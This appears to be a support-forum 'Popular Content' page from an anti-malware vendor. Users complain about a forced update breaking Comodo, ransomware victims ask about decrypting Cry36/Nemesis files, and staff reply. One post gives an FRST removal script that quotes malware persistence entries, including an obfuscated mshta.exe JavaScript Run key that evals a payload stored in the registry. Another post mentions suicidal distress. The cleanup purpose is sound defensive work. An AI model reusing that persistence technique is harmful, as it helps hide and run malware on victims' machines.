Popular Content

Showing content with the highest reputation since 05/18/18 in all areas

  1. 2 points
    I could only confirm David's post - on both my computers with Comodo (Win 7 64 bit, SSD HDD - as this probably had some impact on that unpleasant EAM behaviour) I switched to stable version and all seem to work. So yes, the problem with Comodo on some comps is probably over. I want to add my two cents to discusion above. I work with computer more than 25 years. A lot years ago I worked as programmer. This is all over now (even as I sometimes write a few lines of code in php and MySQL). My main work is with graphics software, but for a few of my customers I do also some kind of computer servis. Not that I'm any expert in LAN's or such but I could help individual users with some computer problems. So my computer knowledges are a little bit above standard. Usually I could help myself with any and all hardware or software troubles, but this time it was very frustrating and it took me a lot of precious time (which I should have spent differently) to revert my work and home computers back to working state. And it was because of EAM "no user asking" PROGRAM update (unfortunately it even didn't create system restore point - why this isn't standard upon bigger program update is above my understanding). This is why I ask you for avoiding such program behaviour. I understand your points but you should hear our opinions also. Maybe it's not wise to let some users decide about something they don't understand but I don't ask you to do this. You can let default EAM settings on stable version update but I'd appreciate the possibility for some of us to switch off this behaviour. Why couldn't you add to setup/actualization menu two choices: 1) update program without asking user 2) update program only after user confirmation? First choice could be the default one - I don't care. This would be enough. And (not only) after this experience I'd immediately switch it to the "update program only after user confirmation". And a few words to Neneduty post: no, I won't uninstall ANY of my programs only because ANY antivirus software couldn't work with it. All programs are in my computers for good reasons (this is true especially for Comodo firewall). This could end that Emsisoft (or any other antivirus producer for that reason) could ask me not to use my graphics programs, because they could be in conflict with EAM (btw. there was situation Adobe Acrobat didn't start because of conflict with EAM one time - I resolved it with Emsisoft help then - fortunately Emsisoft helpdesk didn't want me to uninstall it :-) ). Antivirus software is in any computer to help not to be infected by computer virus; it's not there to block users to work with their programs... Any other debate about this is ridiculous. Uffff. Enough from me.
  2. 1 point
    Fixed that for you. Are you messing with me here? Meant that what you said, being done intentionally, would signify malicious intent. Outcome can be malicious (or not) regardless of intent. EAM is not a complete security software by any stretch to be able to be used on its own, at least by those who know what they want from their computers. It's a piece of software with some specific purposes, which shouldn't get to make any requests about what else runs alongside. Plus, one of your selling points a few years ago was that you specifically advertised as being compatible with other security software, even in case of overlapping features, not to mention complementary ones. You may have moved away from that, as well as from most other good things you had going, but a part of your users, those who came and stayed in part for those features, aren't going to just drop their expectations and, more importantly, drastically change how they use their computers just because you say so. As far as I'm concerned, having security software including EAM on a computer would typically mean either EAM+CFW or EAM+ZA+Sandboxie. There would be a number of other options past that, of course, but at the very least those should be the basic test setup.
  3. 1 point
    That's malicious intent. Intent doesn't matter for a malicious outcome. And security software is far more likely to mess up systems than most programs. And in this case it was something you should have seen early in testing. Said that since you decided years ago to no longer provide a proper firewall (not to mention HIPS and sandboxing, don't know if you had that even then), you should thoroughly test your software paired with at least the leading alternatives that provide those missing features, making a full suite when put together. But, again, talking to walls. Or worse.
  4. 1 point
    Hi all. Just a note that your fix seems to have finally fixed the problem. I had a chance to try it a few days ago and so far I can't tell any obvious problems. I wanted to test it for a bit before replying. I put it in Beta mode, then when that worked put it in Stable. Those both survived reboots. I did update to the latest Comodo Firewall before that (I had been about an update behind). So thanks for eventually finding the fix. This most recent discussion here has motivated me to move back to Delayed, though. I think, generally speaking, experienced users have update fatigue. MS Windows and its attempt at controlling the update process is mostly the culprit here (the whole unpaid beta tester thing and how frequently they break things, after shamelessly tricking many people into Win10), but it isn't only them. Follow the https://www.askwoody.com/ site for a while and one sees the big picture. Despite this recent hiccup with Comodo and how much time it cost me (!) two months ago, I still love your software. I know you don't want what must feel like many different versions of your software. There have also been many reported software and hardware vulnerabilities this year. It must be a difficult time to be responsible for anti-malware software. It won't get any easier. You have to run this show at the level you are capable of. Still, giving the user more control and choice should be a priority. One only has to be burned by updates going wrong a couple of times and one gets update fatigue. Updates going wrong have cost me infinitely more time than malware!
  5. 1 point
    Hi, They may be offline. Depends on where they are located and their working hours. Please run FRST again. Next, select and copy the following text, including the words Start:: and End::. Switch back to the FRST program window, and click the Fix button. It should read the fix directly from the clipboard and run the fix. When it is finished, please attach the fixlog.txt file it created in the same folder the FRST program is in. Start:: HKLM-x32\...\Run: [LManager] => [X] HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid} HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid} HKU\S-1-5-21-2105802288-3190227250-3155975196-1000\...\Run: [*fhfucdg<*>] => "C:\Windows\system32\mshta.exe" javascript:A7vTPl2Q="ImV6Kb";s8U=new%20ActiveXObject("WScript.Shell");GueHx9H="7";nV87Dw=s8U.RegRead("HKCU\\software\\ulrk\\udnbjg");PMswlUc26="C";eval(nV87Dw);wCLbpC50 (the data entry has 10 more characters). <==== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-2105802288-3190227250-3155975196-1000\...\Run: [*pkmf<*>] => "C:\Users\Miyako\AppData\Local\bfd48c\e827be.lnk" <==== ATTENTION (Value Name with invalid characters) HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid} Startup: C:\Users\Miyako\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b0c166.lnk [2016-08-10] Startup: C:\Users\Miyako\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bb68ed.lnk [2017-01-07] SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2105802288-3190227250-3155975196-1000 -> DefaultScope {064BF86B-A0C8-47D8-BED5-98BED62949D2} URL = SearchScopes: HKU\S-1-5-21-2105802288-3190227250-3155975196-1000 -> {064BF86B-A0C8-47D8-BED5-98BED62949D2} URL = BHO: No Name -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> No File Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - No File FF Plugin: @microsoft.com/GENUINE -> disabled [No File] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] 2018-06-05 14:08 - 2016-05-18 20:29 - 000000000 ____D C:\Users\Miyako\AppData\Local\bfd48c HKU\S-1-5-21-2105802288-3190227250-3155975196-1000\Software\Classes\f46b3f: "C:\Windows\system32\mshta.exe" "javascript:McISD83="KsHnjD8x";f75i=new ActiveXObject("WScript.Shell");NX2bYFH="VYUiITa";Zw40eU=f75i.RegRead("HKCU\\software\\ulrk\\udnbjg");ooksS3c="QFNgfL";eval(Zw40eU);V7oaNMtG8="LMKuwWtf";" <==== ATTENTION C:\Users\Miyako\AppData\Local\bfd48c\e827be.lnk Reg: reg delete "HKCU\software\ulrk\udnbjg" /f End::
  6. 1 point
    I would believe those TEMP files are created by BitDefender's scan engine when it is scanning inside archives (or when quarantined files are being rescanned). I don't think they give any specific way to whitelist the files so that they won't be detected, however I will ask our malware analysts for more info.
  7. 1 point
    The unauthorized access attempt to your GMail account may have been unrelated, however even if it was the criminal who made/distributed Cry36/CryptON then please keep in mind that these guys almost always use a VPN to hide their physical location. If they did not, then law enforcement would track them down by their IP address rather quickly, and they'd only have a few months before they were arrested while law enforcement gathered enough evidence to present at a trial.
  8. 1 point
    That is possible, however keep in mind that Cry36 has been around for some time without any real progress being made in decryption, so please note that it may take a little while for security researchers and/or law enforcement to finally get their hands on the private keys to decrypt your files.
  9. 1 point
    Guten Tag, Nein, das sind sie nicht. Unsere Erkennungen sind eigentlich besser. Leider kam es durch eine Verkettung unglücklicher Umstände zu einem weiteren Bug den wir zum Zeitpunkt des Tests bereits behoben aber noch nicht veröffentlichen konnten. Der Test fiel leider genau in die Zeit, wo wir mit dem Fehler bei HP zu kämpfen hatten. Mit freundlichen Grüßen Kathrin
  10. 1 point
    FYI: This does appear to be a new variant of the Nemesis ransomware, which Cry36 is a variant of as well. An affiliate/reseller for Dr.Web is claiming that Dr.Web is capable of decrypting the files (or at least figuring out the private key to use to decrypt them), and selling the service on BleepingComputer's forums. Note that Dr.Web will provide this service for free to anyone who has a license for their business Anti-Virus software. They have a form to request this service available at this link. Edit: Please see the note in the post at this link about Dr.Web not being able to decryt this ransomware, and your current options for recovering files.
  11. 1 point
    I have the same ransomware by [email protected] There is a any chance to descrypt it in near future? Anyone working on decryptor? I'll kill myself, that files was everything for me, i worked for years... Please give me some hope Emsisoft.. I am heartbroken and close to killing myself.
  12. 1 point
    If you want you can these samples here no problem
  13. 0 points
    Please follow the steps here and attach the requested logs so that one of our experts can help you. https://support.emsisoft.com/announcement/2-start-here-if-you-dont-we-are-just-going-to-send-you-back-to-this-thread/
  14. 0 points
    there is an unlock for this ransomware, the problem is you need to know the key. one has to do a bruteforce attack for that: ... Emsisoft, you cannot build a brute force cracker having as core this unlock software I have just send through sendspace ?
  15. 0 points
    Hello, I'm infected with [email protected] and i don't have a backup i just need to recover my important university documents nothing else please is there is anyway to recover it ?
  16. 0 points
    This is true, however we have to consider what has value to our customers, and since the vast majority of our customers don't even know what a firewall is (let alone how to use it) we feel that such technology simply over complicates the product without adding any real value for them, even if it is just a set of controls for the built-in Windows Firewall.
  17. 0 points
    For those on Wilders who are wondering if the mysterious company that purchased Binisoft WFC happens to be Emsisoft, we already went down that road with Online Armor, and then after discontinuing it we developed and subsequently discontinued our own firewall technology. While it's impossible to predict the future, I expect that our interest in such technologies will remain minimal at least in the near future.
  18. -1 points
    This conversation is way off the original topic. The ongoing discussion is neither on topic or constructive. Therefore this topic is now closed.
  • Newsletter

    Want to keep up to date with all our latest news and information?

    Sign Up